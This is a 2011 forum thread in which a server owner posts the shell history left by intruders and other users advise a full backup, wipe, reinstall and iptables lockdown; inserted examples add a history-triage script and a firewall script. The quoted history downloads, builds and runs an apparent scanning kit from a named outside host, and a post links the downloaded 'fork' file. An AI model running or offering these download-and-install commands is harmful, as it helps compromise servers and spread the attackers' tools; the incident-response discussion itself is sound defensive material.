Hacked ??
Posted:
Fri Sep 16, 2011 3:08 pm
by gmcust3
Suddenly I found the few commands below had been run on my server, it MUST BE by some hackers. Now I have changed the root password, but what can be the implications of the commands below?
27 cd /etc/ppp
28 wget gsm-replica.com/allnoscan.tgz
29 tar zxvf allnoscan.tgz
30 cd aastra/
31 wget gsm-replica.com/fork.tgz
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
37 cd ..
38 screen
39 cd ../polycom/
40 cp ../aastra/bios.txt bios.txt
41 screen
42 cd /etc/ppp/aastra/
43 vi vuln
44 rm -rf vuln
45 cd ../polycom/
46 vi vuln
47 rm -rf vuln
48 exit
49 ./start b 4
50 wget http://fs03n3.sendspace.com/dl/8f286c2d ... cb4a6/4e70 f0222f326731/n2u07y/e.zip
51 unzip e.zip
52 mv e.txt bios.txt
53 ./start b 4
I see a folder under the etc folder called ppp. Can I delete it?
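As an added example (not from the thread or from gmcust3), a small triage script that tags the kinds of shell-history entries shown in the post: downloads, archive extraction, build-and-install, cleanup, unknown local binaries and detached sessions. The history it runs over is constructed from the post with the download host replaced by a placeholder, so it is not real server data.

```shell
#!/bin/sh
# Added example, not from the thread: triage a shell history file by tagging the
# kinds of entries the post shows (download, unpack, build, cleanup, unknown
# binary, detached session). The history below is constructed from the post with
# the download host replaced by a placeholder; it is not real server data.

flag_history() {
    # $1 = history file in "N  command" format; prints "TAG<TAB>line" per hit
    while IFS= read -r line; do
        # drop the leading history number so patterns match the command itself
        cmd=$(printf '%s\n' "$line" | sed 's/^[[:space:]]*[0-9]*[[:space:]]*//')
        tag=""
        case "$cmd" in
            wget\ *|curl\ *)                        tag="DOWNLOAD" ;;
            tar\ *|unzip\ *)                        tag="UNPACK" ;;
            perl\ Makefile.PL*|make|make\ install)  tag="BUILD" ;;
            rm\ -rf\ *)                             tag="CLEANUP" ;;
            ./*)                                    tag="EXEC" ;;
            screen*)                                tag="DETACH" ;;
        esac
        if [ -n "$tag" ]; then printf '%s\t%s\n' "$tag" "$line"; fi
    done < "$1"
}

# Constructed sample (left on disk so it can be inspected after the run)
SAMPLE_HISTORY=$(mktemp)
cat > "$SAMPLE_HISTORY" <<'EOF'
   27  cd /etc/ppp
   28  wget attacker.example/allnoscan.tgz
   29  tar zxvf allnoscan.tgz
   30  cd aastra/
   31  wget attacker.example/fork.tgz
   32  tar zxvf fork.tgz
   33  cd fork
   34  perl Makefile.PL
   35  make
   36  make install
   37  screen
   38  vi vuln
   39  rm -rf vuln
   40  ./start b 4
   41  unzip e.zip
   42  ls -la
EOF

flag_history "$SAMPLE_HISTORY"
```

Run it against a copy of the real ~/.bash_history (or /root/.bash_history) taken from a backup or a read-only mount; the tags only help you read the file faster, they are not proof of anything by themselves.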
Posted:
Fri Sep 16, 2011 3:10 pm
by gmcust3
Server was accessed from:
206.125.45.185
95.130.170.231
Posted:
Sat Sep 17, 2011 8:36 pm
by williamconley
32 tar zxvf fork.tgz
33 cd fork
34 perl Makefile.PL
35 make
36 make install
Wipe your system and reinstall. They have added software to your system, and that software could have done ANYTHING while running. You could have extra users, you could be running IP forwarding ... backup, wipe, reinstall, lockdown, restore. iptables whitelist access only.
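As an added example (not from the thread or from williamconley), a script that prints an iptables whitelist-only ruleset for the lockdown step. It emits the commands instead of running them so they can be reviewed first; it assumes IPv4 and TCP-only services, with the admin addresses and ports below being placeholders, and any UDP service the server must expose needs its own rule.

```shell
#!/bin/sh
# Added example, not from the thread: print an iptables "whitelist only" ruleset
# for the lockdown step. It emits commands rather than running them, so you can
# review the output and then apply it as root (whitelist_rules ... | sh).
# Assumptions: IPv4, TCP services only; admin addresses and ports are placeholders.

whitelist_rules() {
    # $1 = space-separated admin IPs/CIDRs, $2 = space-separated TCP ports they may use
    admins=$1
    ports=$2
    # Start permissive so flushing never cuts off the session you are typing in
    echo 'iptables -P INPUT ACCEPT'
    echo 'iptables -F INPUT'
    echo 'iptables -A INPUT -i lo -j ACCEPT'
    echo 'iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT'
    for ip in $admins; do
        for port in $ports; do
            echo "iptables -A INPUT -p tcp -s $ip --dport $port -j ACCEPT"
        done
    done
    # Rate-limited log of everything else, so repeat scanners are visible in syslog
    echo 'iptables -A INPUT -m limit --limit 5/min -j LOG --log-prefix "IPT-DROP: "'
    # Default deny goes last, only after the allow rules above are in place
    echo 'iptables -P INPUT DROP'
}

# Placeholder admin hosts (RFC 5737 documentation ranges) and services: SSH and HTTPS
whitelist_rules "203.0.113.10 198.51.100.0/24" "22 443"
```

Apply it from a console or out-of-band session first, and confirm you can still log in from an allowed address before saving the rules with iptables-save.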
Posted:
Sat Sep 17, 2011 10:31 pm
by gmcust3
Can I delete the PPP folder safely?
Here is the fork file:
http://www.4shared.com/file/gzoJb9Ne/fork.html
Posted:
Sat Sep 17, 2011 10:58 pm
by williamconley
The point from my earlier post is this:
Their software, once running, could have done ANYTHING. It could have installed a rootkit, it could have changed your TTY settings to make anything with the word "free" in it Green ... seriously. Unless you find out what it did, anyone telling you that you can safely delete anything or ...? is "hoping" they are right, but the reality of the matter is that they logged into your system and ran an external application which they downloaded. If the app is still there, you could look it over. If it's an executable ... good luck with that. And remember they could have changed it after running it to cover their tracks.
Wipe it and start over (back up first!!!). Back up NOW. Especially your data.
Of course, you could just delete everything they created and "hope" ... but the results of that could be several thousand dollars in calls to Australia on Wednesday at 4AM. In an hour.
And seriously, *I* have no intention of looking at something that someone like this uploaded into your server. I'm crazy, not ...
Posted:
Mon Sep 19, 2011 3:00 pm
by gardo
I agree with William. Do a clean reinstall. Safer and faster.
Posted:
Mon Sep 19, 2011 5:00 pm
by williamconley
And I'm not saying fighting a virus isn't great sport ... but is it worth the risk and effort (both)?
10 years or so ago, when most of the country (Windows users, anyway) got hit with that supervirus (ok, lots of places did), I got a heads-up call from a network admin that she had "a problem" with her network, and I should check ours, too. Turns out servers across the known universe were being hit. Her company called in "the pros", and my boss said "handle it, but it comes out of YOUR department's budget".
Her company's "Pros" battled the virus, blew about $8000, lost that day's data, wiped all the workstations and servers clean and reinstalled all their software. Bear in mind that we both had Norton installed. And updated.
*I*, on the other hand (after learning that when the Pros began to try to delete files and fight the virus ... it began to delete data and essential system files!), did that thing many forget in that moment. I initiated a backup, and told everyone on the sales floor and admin offices to Keep Paper Copies of everything today.
As soon as the backup completed, I broke our connection to the Net (pissed off everyone, of course, but since we didn't have VOIP, it was not a big deal).
As soon as business closed for the night, I did another backup, and once again pulled out the DAT tapes as soon as they were done for storage (hoping they would not be corrupt).
Then I shut off every computer in the office by pulling the plug, including the servers.
Then I turned on the net.
Then I booted every machine from a Live Desktop (Demo!) CD one at a time, starting with the domain controller ... and scrubbed every computer in the office with "Housecall" and every other virus checker I could find until each one scanned clean.
Then I loaded up the new virus rules into Norton (apparently there was a new version for some reason) ... and restored the data and immediately scanned again.
*Poof* no loss of servers or systems or $8000 (but I worked well into the morning). Nobody took a pay cut. (I got the next day off due to unconsciousness.)
You ready to try to do that without Norton or Housecall? There are rootkit detectors for Linux. It should only take a few hours. Maybe.
Or you can just back up your mysql data (text file, no virus) and reinstall, then restore your data.
Up to you, though. Obviously.